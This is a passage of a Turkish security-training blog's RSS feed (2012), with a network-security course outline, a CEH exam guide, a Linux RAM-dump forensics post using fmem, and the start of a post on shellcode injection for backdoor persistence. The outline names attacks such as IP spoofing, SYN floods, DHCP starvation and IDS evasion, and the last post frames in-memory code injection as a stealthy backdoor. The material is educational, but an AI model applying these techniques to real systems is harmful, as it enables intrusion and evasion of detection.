<li>Nemesis Kullanarak ARP DoS Saldırısı</li>
<li>Mac Flooding Saldırısı ve Amacı</li>
<li>ARP Saldırılarından Korunma Yöntemleri</li>
<li>Statik Çözümler, Dinamik Çözümler</li>
<li>Bilgisayarlara Statik ARP Kaydı Girme</li>
<li>Statik ARP Kayıt Korumasını Aşma</li>
<li>Switchlerde Port Security  Özelliğini Devreye Alma</li>
<li>Switchlerde DHCP Snooping Devreye Alma</li>
<li>802.1x Kullanımı</li>
<li>IDS/IPS Sistemler ve ARP Saldırıları</li>
<li>ARPWatch, ARPOn Yazılımıları</li>
<li>Snort ve ARP Saldırıları</li>
</ul>
<p>&nbsp;</p>
<p><strong>5)Internet Protocol ve Güvenlik Zafiyetleri</strong></p>
<ul>
<li>Internet Protokolü v4</li>
<li>TCP/IP Protokol Ailesinde IP&#8217;nin Yeri ve Önemi</li>
<li>IP Başlık Bigisi</li>
<li>IPv6 ile Farkları</li>
<li>IP Katmanında Adresleme Yöntemleri</li>
<li>IP Adresi</li>
<li>NAT Kavramı ve Günümüzde Uygulanması</li>
<li>IP Adres Sahibinin Bulunması</li>
<li>Ülke, İl ve Firmaya Göre IP Adresi Sahipliği</li>
<li>Ülke IP Blokları Ne İşe Yarar?</li>
<li>Internette Yol Bulma</li>
<li>Traceroute ve L4 Tracerpoute Çalışmaları</li>
<li>Traceroute Keşif Çalışmalarını Firewall/IPS&#8217;den Engelleme</li>
<li>IP Spoofing</li>
<li>Nedir, Ne Amaçla Kullanılır?</li>
<li>Hping Kullanarak IP Spoofing Örnekleri</li>
<li>Protokole Özel IP Spoofing Yöntemleri</li>
<li>TCP Tabanlı Protokollerde(SMTP, HTTP, FTP) IP Spoofing</li>
<li>UDP Tabanlı Protokoller ve IP Spoofing</li>
<li>TCP&#8217;de ISN Kavramı</li>
<li>NAT Kullanılan Ortamlarda IP Spoofing</li>
<li>IP Spoofing Önleme için URPF Kullanımı</li>
<li>Kevin Mitnick IP Spoofing Örneği</li>
<li>ISN Tahmini</li>
<li>IP Saklama Amaçlı Proxy Kullanımı</li>
<li>IP Parçalama(Fagmentation)</li>
<li>Nedir, Ne Amaçla Kullanılır?</li>
<li>Offset Değeri</li>
<li>Port Taramalarında Parçalanmış Paket Kullanımı</li>
<li>IP Parçalama Kullanılarak Gerçekleştirilmiş Saldırılar</li>
<li>IP parçalama Kullanarak L7 Firewall Atlatma</li>
<li>IP Parçalama Kullanarak IDS Atlatma</li>
<li>IP Parçalama Tehditine Karşı Geliştirilen Çözümler ve IPS</li>
</ul>
<p>&nbsp;</p>
<p><strong>6)TCP/UDP Protokolleri ve Güvenlik Zafiyetleri</strong></p>
<ul>
<li>TCP/IP PRotokol Ailesi ve UDP</li>
<li>UDP&#8217;e Genel Bakış</li>
<li>UDP Başlık İncelemesi</li>
<li>UDP, TCP Arasındaki Farklar</li>
<li>UDP Port Tarama</li>
<li>İsteğe göre UDP paketi oluşturma</li>
<li>UDP Protokolünde IP Spoofing</li>
<li>UDP Flood DoS/DDoS Saldırısı</li>
<li>UDP Flood Saldırıları ve Güvenlik Duvarları</li>
<li>TCP&#8217;ye Genel Bakış</li>
<li>TCP Başlık Bilgisi İnceleme</li>
<li>TCP Kullanan Uygulamalar</li>
<li>TCP&#8217;de IP Spoofing</li>
<li>IP Spoofing Koruması İçin ISN Kullanımı</li>
<li>ISN Tahmin Çalışmaları</li>
<li>TCP&#8217;de Bayrak Mekanizması (TCP Flags)</li>
<li>SYN, ACK, FIN, PUSH, RST, URG Paketleri</li>
<li>Sık Kullanılmayan Diğer TCP Bayrakları</li>
<li>İletişimin Başlaması ve Sonlandırılması Aşamalarında Bayraklar</li>
<li>TCP State Diyagram</li>
<li>TCP&#8217;de Oturum Kavramı</li>
<li>Güvenlik Duvarları ve TCP</li>
<li>TCP Üzerinden Port Tarama</li>
<li>IDS/IPS&#8217;lerin TCP Taramalarını Yakalaması</li>
<li>TCP Prookolü Kullanarak Traceroute Keşif Çalışması</li>
<li>TCP Flood DDoS Saldırıları</li>
<li>SYN Flood</li>
<li>ACK Flood</li>
<li>FIN Flood Saldırıları ve Çalışma Mantığı</li>
<li>TCP Flood Saldırılarından Korunma Yöntemleri</li>
<li>SYN cookie, Syn Proxy, Syn cache yöntemleri</li>
</ul>
<p>&nbsp;</p>
<p><strong>7)DHCP ve Güvenlik Zafiyetleri</strong></p>
<ul>
<li>DHCP ve Kullanım Alanları</li>
<li>DHCP Başlık Bilgisi Analizi</li>
<li>DHCP Nasıl Çalışır?</li>
<li>DHCP için Kullanılan Portlar</li>
<li>DHCP Discover, Offer, Request ve ACK Adımları</li>
<li>DHCP Relay Agent Kavramı ve Çalışma Mantığı</li>
<li>DHCP yoluyla Gerçekleştirilen Saldırılar</li>
<li>Kaynak Tüketme Saldırısı &#8211; DHCP  Resource Starvation</li>
<li>Sahte DHCP Sunucu Kullanımı Rogue DHCP Server Deployment</li>
<li>DHCP Spoofing</li>
<li>DHCP Saldırı Araçları</li>
<li>DHCP Ataklarından Korunma Yöntemleri</li>
</ul>
<p>&nbsp;</p>
<p><strong>8)DNS ve Güvenlik Zafiyetleri</strong></p>
<ul>
<li>DNS Nedir?</li>
<li>DNS Tarihçesi</li>
<li>DNS Protokolü Başlık Bilgisi Analizi</li>
<li>DNS ve UDP İlişkisi</li>
<li>DNS ve TCP İlişkisi</li>
<li>DNS Ne Zaman TCP Kullanır</li>
<li>DNS Nasıl Çalışır?</li>
<li>Root DNS Sunucular ve Rolleri</li>
<li>DNS Sorgulamalaru ve Çeşitleri</li>
<li>DNS Sunucu Çeşitleri</li>
<li>DNS Önbellek Yapısı</li>
<li>DNS Sorgulamaları için Dig Kullanımı</li>
<li>DNS&#8217;e Yönelik Saldırılar</li>
<li>DNS Kullanılarak Gerçekleştirilen Saldırılar</li>
<li>DNS&#8217;in Kötüye Kullanımı</li>
<li>DNS Sunucu Versiyon Bilgisini Belirleme</li>
<li>Zone Transfer Denemesi</li>
<li>DNS Spoofing</li>
<li>DNS Cache Snooping</li>
<li>DNS Rebindinhüg</li>
<li>DNS Tünelleme</li>
<li>DNS DoS/DDoS Saldırıları</li>
<li>DNS Flood Saldırıları</li>
<li>Amplified DNS Dos Saldırısı</li>
<li>DNSSEC ve Getirdiği Güvenlik Özellikleri</li>
</ul>
<p>&nbsp;</p>
<p><strong>9)TCP/IP Ağlarda Paket Analizi ve Sniffer Kullanımı</strong></p>
<ul>
<li>Tcpdump Trafik Analizi</li>
<li>Sniffer olarak Tcpdump</li>
<li>Temel Tcpdump Kullanımı</li>
<li>Paketleri Kaydetme</li>
<li>Kaydedilmiş Paketleri Diskten Okuma</li>
<li>Trafik Analiz Filtreleri</li>
<li>Sadece Belirli Host/Port İçin Trafik Yakalama</li>
<li>BPF</li>
<li>İleri Seviye Tcpdump Kullanımı</li>
<li>Nmap Taramalarını Tcpdump Kullanarak Yakalama</li>
<li>DDoS Saldırılarında Tcpdump Kullanımı</li>
<li>Wireshark/Tshark Kullanarak Paket Analizi</li>
<li>Temel Wireshark Kullanımı</li>
<li>Wireshark Filtre Kullanımı</li>
<li>Display Filter</li>
<li>Capture Filter Özellikleri</li>
<li>İleri Seviye Filtremele</li>
<li>Network Forensics için Wireshark Kullanımı</li>
<li>Trafik Analizinde Özet Bilgi Alma</li>
<li>Protokol Kullanım Oranları</li>
<li>TCP Oturumlarında Paket Birleştirme</li>
<li>Wireshark Kullanarak Firewall Kuralı Yazımı</li>
<li>HTTP Bağlantılarında Veri Ayıklama</li>
<li>HTTPs Trafiği Çözümleme</li>
<li>WEP/WPA Şifreli Trafik Çözümleme</li>
<li>Tshark Kullanımı</li>
<li>Wireshark Tshark Farklılıkları</li>
<li>Tcpdump, Tshark Farkları</li>
<li>Tshark ile Display Filter ve Capture Filter Kullanımı</li>
<li>Network Forensics Çalışmalarında Tshark Kullanımı</li>
<li>Örnek Paket Analizleri</li>
<li>Cloud Ortamında Hizmet veren Trafik Analiz Sistemleri</li>
</ul>
<p>&nbsp;</p>
<p><strong>10)Network Forensics Temelleri</strong></p>
<ul>
<li>Nedir, Neden Önemlidir?</li>
<li>Network Forensics Bileşenleri</li>
<li>Yakala, Kaydet, Analiz Et, Raporla</li>
<li>Ağ Trafiğinden Veri Ayıklama</li>
<li>Ngrep Ağ trafiğinde veri Yakalama</li>
<li>Basit IDS Tasarımı</li>
<li>Tünelleme Kullananların Ngrep ile Belirlenmesi</li>
<li>Veri Ayıklama Yazılımları</li>
<li>ChaosReader</li>
<li>Tcpexract</li>
<li>Tcpflow</li>
<li>Network Miner</li>
<li>Xplico Kullanımı</li>
<li>SSL Kullanılan Ortamlarda Network forensics</li>
<li>Network Forensics Çalışmalarını Atlatma</li>
</ul>
<p>&nbsp;</p>
<p><strong>11)Şifreleme Protokolleri ve Güvenlik Zafiyetleri</strong></p>
<ul>
<li>Bilgisayar Ağlarında Şifreleme ve Getirileri</li>
<li>Şifrelemenin Dezavantajları</li>
<li>SSL Wrapper Kullanımı</li>
<li>Şifreli Protokoller</li>
<li>SSL, TLS, SSH</li>
<li>SSL/TLS Protokol Analizi</li>
<li>SSL , TLS Arasındaki Farkları</li>
<li>OSI Katmanında TLS&#8217;in Yeri</li>
<li>SSL/TLS&#8217;e Yönelik Gerçekleştirilmiş Ataklar</li>
<li>SSLsniff</li>
<li>ssldump</li>
<li>sslstrip</li>
<li>Şifreli Protokollerde Araya Girme</li>
<li>Temel HTTP bilgisi</li>
<li>HTTP ve SSL Kullanılan Ortamlardaki Riskler</li>
<li>SSH Protokolü Detayları</li>
<li>SSH Kullanarak Firewall/IPS/ Atlatma</li>
<li>SSH Tünelleme ile İçerik Filtreleme Sistemlerini Atlatma</li>
<li>SSH Protokol versiyonları</li>
<li>SSH-1 Protokolünde Araya Girme ve Veri Okuma</li>
<li>SSH-2&#8242;de Araya Girme</li>
<li>SSL Sertifikaları</li>
<li>Sertifika Alım Süreçleri</li>
<li>Sahte Sertifikalar Nasıl Belirlenir?</li>
<li>Sertifika Otoritesi ve Önemi</li>
<li>Dünyadan Örneklerle Sertifika Güvenliği</li>
<li>Self Signed Sertifika Üretimi</li>
</ul>
</div>
 <img src="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?view=1&post_id=2305" width="1" height="1" style="display: none;" />]]></content:encoded>
			<wfw:commentRss>http://blog.bga.com.tr/genel/uygulamali-ag-guvenligi-egitimi-icerigi-guncellendi-v4/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>CEH, LPT, CHFI Sertifika Sınavlarına Giriş Rehberi</title>
		<link>http://blog.bga.com.tr/genel/ceh-lpt-chfi-sertifikalarina-giris-rehberi</link>
		<comments>http://blog.bga.com.tr/genel/ceh-lpt-chfi-sertifikalarina-giris-rehberi#comments</comments>
		<pubDate>Sat, 28 Jan 2012 14:05:35 +0000</pubDate>
		<dc:creator>bga</dc:creator>
				<category><![CDATA[Beyaz Şapkalı Hacker(CEH)]]></category>
		<category><![CDATA[Genel]]></category>
		<category><![CDATA[ceh sertifikası]]></category>
		<category><![CDATA[ceh sınavı giriş ücreti]]></category>
		<category><![CDATA[ceh sınavına nasıl girilir]]></category>

		<guid isPermaLink="false">http://blog.bga.com.tr/?p=2289</guid>
		<description><![CDATA[Bilgi Güvenliği AKADEMİSİ olarak takipçilerimizden ve öğrencilerimizden aldığımız soruların hatırı sayılır bir kısmını sertifika sınavlarına giriş konusu oluşturmaktadır. Her sertifika sınavı için farklı bir prosedür izlenmesi gerektiği için ayrı ayrı hepsini yazmayı planlıyoruz. İlk olarak Türkiye’de yetkili eğitim merkezi olduğumuz Ec-council’a ait CEH, ECSA/LPT, CHFI sertifikalarına ait sınava giriş prosedürünü yayınlıyoruz. Sizlerden gelecek geribildirimlerle CISSP [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovL2Jsb2cuYmdhLmNvbS50ci93cC1jb250ZW50L3VwbG9hZHMvMjAxMi8wMS9jZXJ0Y2VoLmpwZw=="><img class="aligncenter size-full wp-image-2290" title="certceh" src="http://blog.bga.com.tr/wp-content/uploads/2012/01/certceh.jpg" alt="" width="600" height="203" /></a></p>
<p>Bilgi Güvenliği AKADEMİSİ olarak takipçilerimizden ve öğrencilerimizden aldığımız soruların hatırı sayılır bir kısmını sertifika sınavlarına giriş konusu oluşturmaktadır.</p>
<p>Her sertifika sınavı için farklı bir prosedür izlenmesi gerektiği için ayrı ayrı hepsini yazmayı planlıyoruz. İlk olarak Türkiye’de yetkili eğitim merkezi olduğumuz Ec-council’a ait CEH, ECSA/LPT, CHFI sertifikalarına ait sınava giriş prosedürünü yayınlıyoruz. Sizlerden gelecek geribildirimlerle CISSP ve diğer sertifika sınavlarına giriş prosedürlerini de Türkçe olarak yayınlamayı planlıyoruz.<span id="more-2289"></span></p>
<p>&nbsp;</p>
<div>
<p>C|EH(Certified Ethical Hacker) 2011 yılı itibariyle Bilgi Güvenliği konusunda en fazla bilinen ve tercih edilen sertifika olmaya hak kazanmıştır. (Tüm dünyada yaklaşık 38.000 kişide bulunmaktadır). Bilinenin aksine C|EH, uzmanlık sertifikası değildir, daha cok güvenliğin offensive kısmıyla ilgilenenler için düşünülmüş başlangıç-orta seviye bir sertifikadır.<strong id="internal-source-marker_0.574620975414291"></strong></p>
<p>C|EH sertifikası sınavı kodu yetkili eğitim merkezlerinden eğitim alanlar için 312-50, akredite olmayan eğitim kurumlarından eğitim alan ya da kendi imkanlarıyla çalışanlar için EC0-350 olmaktadır. Her iki sınav da aynı ve sınav sonucu verilen sertifikalar aynıdır.<br />
<strong id="internal-source-marker_0.574620975414291"><br />
<span style="text-decoration: underline; font-size: medium;">Akredite Eğitim Merkezinden Eğitim Alanlar </span></strong></p>
<p>Akredite bir kurumdan eğitim alanlar sınava basvuru icin herhangi bir sürecten <strong>gecmemektedirler</strong>.</p>
</div>
<div>Sadece sınava girmek istedikleri tarihi  kuruma bildirmeleri ve akredite kurumun sınav gözetmeni ayarlaması ile sınava girilebilmektedir.</div>
<div></div>
<div>
<p>Türkiye’deki tek akredite eğitim kurumu ve sınav merkezi  <strong>Bilgi Güvenliği AKADEMİSİ</strong>’dir. Akademiden eğitim alarak sınava giren 100’ün üzerindeki öğrencimizden bir tanesi haric hepsi sertifika sınavını başarıyla vermiştir.<strong id="internal-source-marker_0.574620975414291"></strong></p>
<p><strong>Sınav Ücreti:</strong> Sertifika sınav ücreti 500$ veya altında bir ücret olabilmektedir. (Eğitim kurumuna bağlı). Bilgi Güvenliği AKADEMİSİ&#8217;nden eğitim alanlar için sınav ücreti 450$ olmaktadır.</p>
<p>&nbsp;</p>
<p><strong><span style="text-decoration: underline; font-size: medium;">Akredite Olmayan  Kurumlardan  Eğitim Alanlar (Kendi İmkanlarıyla Çalışanlar)</span></strong></p>
</div>
<div></div>
<div><strong id="internal-source-marker_0.574620975414291">Bu seçenekle sınava girecek olanlar için aşağıdaki nitelik ve belgeler gerekmektedir.<br />
</strong></p>
<ul>
<li>İki yıllık bilgi güvenliği alanında çalışma deneyimi.</li>
<li><a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cHM6Ly9jZXJ0LmVjY291bmNpbC5vcmcvd3AtY29udGVudC91cGxvYWRzLzIwMTEvMTEvQ0VILUV4YW0tRWxpZ2liaWxpdHktQXBwbGljYXRpb24tRm9ybS12MS4xLTE5MDEyMDEyLnBkZg==">https://cert.eccouncil.org/wp-content/uploads/2011/11/CEH-Exam-Eligibility-Application-Form-v1.1-19012012.pdf</a> adresinden indirilecek Eligibility Application Form’un doldurulması (100$)</li>
</ul>
<ul>
<li>Bağlı bulunduğunuz yöneticiden alınacak tavsiye mektubu. (İmzalı)</li>
</ul>
<ul>
<li>Sürücü lisans belgesi, Pasaport veya Nüfüs cüzdanı fotokopisi</li>
</ul>
</div>
<div>
<div>Yukardaki belgeler <a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=bWFpbHRvOmNlcnRtYW5hZ2VyQGVjY291bmNpbC5vcmc=">certmanager@eccouncil.org</a> adresine kurumsal bir e-posta adresinden gönderilmelidir. Ücretsiz e-posta sağlayıcılardan gönderilen postalar(Yahoo, Gmail, Hotmail vs) dikkate alınmamaktadır. Belgelerin kontrolünden sonra prometric üzerinden sınav alırken sorulacak kod gönderilecek ve siz de bu kodu kullanarak Prometric&#8217;ten sınav satın alabilir duruma geleceksiniz.</div>
<div></div>
<div></div>
<div><strong>Sınav Ücreti:</strong>Akredite eğitim merkezinden eğitim almamış olanlar için toplamda <strong>600$</strong>tutmaktadır.</div>
<div>
<p>500$+100$(application of eligibility code ücreti)</p>
</div>
</div>
<div></div>
<div>
<div>
<div dir="ltr">
<table>
<colgroup>
<col width="288" />
<col width="336" /></colgroup>
<tbody>
<tr>
<td>CEH v7 VUE Exam Voucher</td>
<td>$ 500.00 USD</td>
</tr>
</tbody>
</table>
</div>
<div dir="ltr">
<table>
<colgroup>
<col width="290" />
<col width="334" /></colgroup>
<tbody>
<tr>
<td>Prometric APTC Eligibility Application Fee</td>
<td>$ 100.00 USD</td>
</tr>
</tbody>
</table>
</div>
<p>Sertifika fiyatlarıyla ilgili bilgi almak için <a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cHM6Ly93d3cuMmNoZWNrb3V0LmNvbS8yY28vYnV5ZXIvb3JkZXJwYWdlP3NpZD01MTc4OSZhbXA7dGNvX2N1cnJlbmN5PVVTRA==">bu adresi</a> ziyaret edebilirsiniz.</p>
<p>Prometric üzerinden sınav satın aldıktan sonra belirlenen herhangi bir günde sınava giriş yapılabilir.</p>
<p>Sınavda başarılı olunması durumunda sertifikanın gelmesi yaklaşık iki ay sürmektedir.</p>
<p>&nbsp;</p>
<p>CHFI ve ECSA/LPT sertifika sınavlarına girmek için CEH benzeri yol izlenebilir.</p>
</div>
</div>
<p><!--more--></p>
 <img src="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?view=1&post_id=2289" width="1" height="1" style="display: none;" />]]></content:encoded>
			<wfw:commentRss>http://blog.bga.com.tr/genel/ceh-lpt-chfi-sertifikalarina-giris-rehberi/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Linux Sistemlerde Memory (RAM) Imajı Almak</title>
		<link>http://blog.bga.com.tr/forensics/linux-sistemlerde-memory-ram-imaji-almak</link>
		<comments>http://blog.bga.com.tr/forensics/linux-sistemlerde-memory-ram-imaji-almak#comments</comments>
		<pubDate>Mon, 23 Jan 2012 14:19:12 +0000</pubDate>
		<dc:creator>bga</dc:creator>
				<category><![CDATA[Forensics]]></category>
		<category><![CDATA[Güvenlik Araçları]]></category>
		<category><![CDATA[fmem memory dump]]></category>
		<category><![CDATA[how i can dump linux memory]]></category>
		<category><![CDATA[linux memory dump]]></category>
		<category><![CDATA[linux ram analyz]]></category>
		<category><![CDATA[linux ram imajı almak]]></category>
		<category><![CDATA[ram imajı almak]]></category>
		<category><![CDATA[ram imajı nedir]]></category>

		<guid isPermaLink="false">http://blog.bga.com.tr/?p=2265</guid>
		<description><![CDATA[Fmem, linux sistemlerde RAM imajını almak için kullanılan bir forensic aracıdır. Bir kernel modülü olarak çalışır.Sisteme sürü olarak yüklenir ve /dev/fmem dizininde bulunur.Tıpkı /dev/mem gibidir fakat bir limit yoktur (1MB/1GB dağıtıma bağlı olarak) Kurulumu wget http://hysteria.sk/~niekt0/foriana/fmem_current.tgz tar zxvf fmem_current.tgz cd fmem_1.6-0 # make rm -f *.o *.ko *.mod.c Module.symvers Module.markers modules.order \.*.o.cmd \.*.ko.cmd \.*.o.d rm [...]]]></description>
			<content:encoded><![CDATA[<p>Fmem, linux sistemlerde RAM imajını almak için kullanılan bir forensic aracıdır.<br />
Bir kernel modülü olarak çalışır.Sisteme sürü olarak yüklenir ve /dev/fmem dizininde bulunur.Tıpkı /dev/mem gibidir fakat bir limit yoktur (1MB/1GB dağıtıma bağlı olarak)</p>
<p><span style="font-size: medium;"><strong>Kurulumu</strong></span><br />
wget http://hysteria.sk/~niekt0/foriana/fmem_current.tgz</p>
<p>tar zxvf fmem_current.tgz</p>
<p>cd fmem_1.6-0</p>
<p># make<br />
rm -f *.o *.ko *.mod.c Module.symvers Module.markers modules.order \.*.o.cmd \.*.ko.cmd \.*.o.d<br />
rm -rf \.tmp_versions<br />
make -C /lib/modules/`uname -r`/build SUBDIRS=`pwd` modules<br />
make[1]: Entering directory `/usr/src/linux-headers-2.6.38-11-generic&#8217;<br />
CC [M] /root/fmem_1.6-0/lkm.o<br />
LD [M] /root/fmem_1.6-0/fmem.o<br />
Building modules, stage 2.<br />
MODPOST 1 modules<br />
CC /root/fmem_1.6-0/fmem.mod.o<br />
LD [M] /root/fmem_1.6-0/fmem.ko<br />
make[1]: Leaving directory `/usr/src/linux-headers-2.6.38-11-generic&#8217;<span id="more-2265"></span></p>
<p># ./run.sh<br />
Module: insmod fmem.ko a1=0xffffffff8106e590 : OK<br />
Device: /dev/fmem<br />
&#8212;-Memory areas: &#8212;&#8211;<br />
reg00: base=0&#215;000000000 ( 0MB), size= 2048MB, count=1: write-back<br />
reg01: base=0&#215;080000000 ( 2048MB), size= 512MB, count=1: write-back<br />
reg02: base=0x0a0000000 ( 2560MB), size= 128MB, count=1: write-back<br />
reg03: base=0x0a8000000 ( 2688MB), size= 64MB, count=1: write-back<br />
reg04: base=0&#215;100000000 ( 4096MB), size= 1024MB, count=1: write-back<br />
reg05: base=0&#215;140000000 ( 5120MB), size= 128MB, count=1: write-back<br />
reg06: base=0x0b0000000 ( 2816MB), size= 256MB, count=1: write-combining<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
!!! Don&#8217;t forget add &#8220;count=&#8221; to dd !!!</p>
<p><span style="font-size: medium;"><strong>Kullanımı</strong></span><br />
# dd if=/dev/fmem of=&#8230; bs=1MB count=&#8230;</p>
<p>Örnek;<br />
# dd if=/dev/fmem of=/tmp/memory.dump bs=10MB count=2048<br />
dd: reading `/dev/fmem&#8217;: Bad address<br />
286+0 records in<br />
286+0 records out<br />
2860000000 bytes (2.9 GB) copied, 34.6138 s, 82.6 MB/s</p>
<p><strong>/tmp/memory.dump</strong> altında ram imajını bulabilirsiniz.</p>
<p><span style="font-size: medium;"><strong>Yazar:</strong></span><br />
<span style="font-size: medium;"><strong>Ozan UÇAR</strong></span><br />
<span style="font-size: medium;"><strong>ozan.ucar@bga.com.tr</strong></span></p>
 <img src="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?view=1&post_id=2265" width="1" height="1" style="display: none;" />]]></content:encoded>
			<wfw:commentRss>http://blog.bga.com.tr/forensics/linux-sistemlerde-memory-ram-imaji-almak/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>“Ağ Güvenliği”, “Pfsense”, “Güvenlik Yöneticileri İçin Linux” Eğitimleri</title>
		<link>http://blog.bga.com.tr/duyurular/ag-guvenligi-pfsense-guvenlik-yoneticileri-icin-linux-egitimleri</link>
		<comments>http://blog.bga.com.tr/duyurular/ag-guvenligi-pfsense-guvenlik-yoneticileri-icin-linux-egitimleri#comments</comments>
		<pubDate>Mon, 23 Jan 2012 10:21:04 +0000</pubDate>
		<dc:creator>bga</dc:creator>
				<category><![CDATA[Duyurular]]></category>
		<category><![CDATA[Network Security]]></category>
		<category><![CDATA[pfSense]]></category>

		<guid isPermaLink="false">http://blog.bga.com.tr/?p=2241</guid>
		<description><![CDATA[&#160; &#160; Uygulamalı Ağ Güvenliği Eğitimi (Ankara-İstanbul) Eğitim Tarihleri: Ankara: 15-17 Şubat 2012 İstanbul:3,4,10 Mart 2012 (Hafta sonu programı) Eğitim içeriği ve detaylar için : http://www.bga.com.tr/uygulamali-ag-guvenligi-egitimi-ankaraistanbul/ Ağ ve Güvenlik Yöneticileri için Linux Eğitimi (Ankara-İstanbul) Eğitim Tarihleri: Ankara:10-12 Şubat 2012 İstanbul: 6-8 Mart 2012 Eğitim içeriği ve detaylar için : http://www.bga.com.tr/ag-ve-guvenlik-yoneticileri-icin-linux-egitimi-ankaraistanbul/ Pfsense Güvenlik Duvarı Eğitimi (Ankara-İstanbul) Eğitim Tarihleri: Ankara: 15-17 Şubat [...]]]></description>
			<content:encoded><![CDATA[<p>&nbsp;</p>
<p><strong><a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovL3d3dy5iZ2EuY29tLnRyL3dwLWNvbnRlbnQvdXBsb2Fkcy8yMDEyLzAxLzNlZ2l0aW0xLmpwZw=="><img title="3egitim1" src="http://www.bga.com.tr/wp-content/uploads/2012/01/3egitim1.jpg" alt="" width="671" height="208" /></a></strong></p>
<p>&nbsp;</p>
<ul>
<li><strong>Uygulamalı Ağ Güvenliği Eğitimi (Ankara-İstanbul)</strong></li>
</ul>
<p><strong>Eğitim Tarihleri:<br />
Ankara: </strong>15-17 Şubat 2012<strong><br />
İstanbul:</strong>3,4,10 Mart 2012 (Hafta sonu programı)<strong><br />
Eğitim içeriği ve detaylar için :</strong> <a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovL3d3dy5iZ2EuY29tLnRyL3V5Z3VsYW1hbGktYWctZ3V2ZW5saWdpLWVnaXRpbWktYW5rYXJhaXN0YW5idWwv" target=\"_blank\">http://www.bga.com.tr/<wbr>uygulamali-ag-guvenligi-<wbr>egitimi-ankaraistanbul/</wbr></wbr></a><strong><br />
</strong></p>
<p><strong><br />
</strong></p>
<ul>
<li><strong>Ağ ve Güvenlik Yöneticileri için Linux Eğitimi (Ankara-İstanbul)</strong></li>
</ul>
<p><strong>Eğitim Tarihleri:<br />
Ankara:</strong>10-12 Şubat 2012<strong><br />
İstanbul: </strong>6-8 Mart 2012<strong><br />
</strong><strong>Eğitim içeriği ve detaylar için : </strong><a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovL3d3dy5iZ2EuY29tLnRyL2FnLXZlLWd1dmVubGlrLXlvbmV0aWNpbGVyaS1pY2luLWxpbnV4LWVnaXRpbWktYW5rYXJhaXN0YW5idWwv" target=\"_blank\">http://www.bga.com.tr/ag-ve-<wbr>guvenlik-yoneticileri-icin-<wbr>linux-egitimi-ankaraistanbul/</wbr></wbr></a><strong><br />
</strong></p>
<p><strong><br />
</strong></p>
<ul>
<li><strong>Pfsense Güvenlik Duvarı Eğitimi (Ankara-İstanbul)</strong></li>
</ul>
<p><strong>Eğitim Tarihleri:<br />
Ankara: </strong>15-17 Şubat 2012<strong><br />
İstanbul:</strong>27-29 Ocak 2012<strong><br />
</strong><strong>Eğitim içeriği ve detaylar için: </strong><a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovL3d3dy5iZ2EuY29tLnRyL3Bmc2Vuc2UtZ3V2ZW5saWstZHV2YXJpLWVnaXRpbWktaXN0YW5idWwv" target=\"_blank\">http://www.bga.com.tr/pfsense-<wbr>guvenlik-duvari-egitimi-<wbr>istanbul/</wbr></wbr></a></p>
 <img src="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?view=1&post_id=2241" width="1" height="1" style="display: none;" />]]></content:encoded>
			<wfw:commentRss>http://blog.bga.com.tr/duyurular/ag-guvenligi-pfsense-guvenlik-yoneticileri-icin-linux-egitimleri/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Linux Shellcode Injection</title>
		<link>http://blog.bga.com.tr/pentest-2/network-pentest/linux-shellcode-injection</link>
		<comments>http://blog.bga.com.tr/pentest-2/network-pentest/linux-shellcode-injection#comments</comments>
		<pubDate>Fri, 20 Jan 2012 22:03:49 +0000</pubDate>
		<dc:creator>bga</dc:creator>
				<category><![CDATA[Linux Pentest]]></category>
		<category><![CDATA[Network Pentest]]></category>
		<category><![CDATA[linux backdoors shellcode]]></category>
		<category><![CDATA[linux shellcode injection]]></category>
		<category><![CDATA[shellcode injection]]></category>

		<guid isPermaLink="false">http://blog.bga.com.tr/?p=2256</guid>
		<description><![CDATA[Pentest çalışmalarında, hedef sisteme erişim elde edildikden sonra sistemde kalıcı hale gelmek için arka kapılar oluşturulur.Bu konuda geliştirilen tekniklerden biri, çalışan bir process&#8217;e kod enjekte etmekdir. Bu yöntemle, process&#8217;in dosya sistemindeki binary&#8217;sine herhangi bir zarar verilmediği için süreç RAM&#8217;de devam eder. Dolayısıyla, kendini diske yazan backdoor&#8217;lara göre tespit edilmesi daha da güçtür. Bir başka yazıda, [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovL2Jsb2cuYmdhLmNvbS50ci93cC1jb250ZW50L3VwbG9hZHMvMjAxMi8wMS9zaGVsbGNvZGVpbmplY3Rpb24ucG5n"><img class="alignleft  wp-image-2258" title="shellcodeinjection" src="http://blog.bga.com.tr/wp-content/uploads/2012/01/shellcodeinjection.png" alt="" width="551" height="200" /></a></p>
<p>Pentest çalışmalarında, hedef sisteme erişim elde edildikden sonra sistemde kalıcı hale gelmek için arka kapılar oluşturulur.Bu konuda geliştirilen tekniklerden biri, çalışan bir process&#8217;e kod enjekte etmekdir.</p>
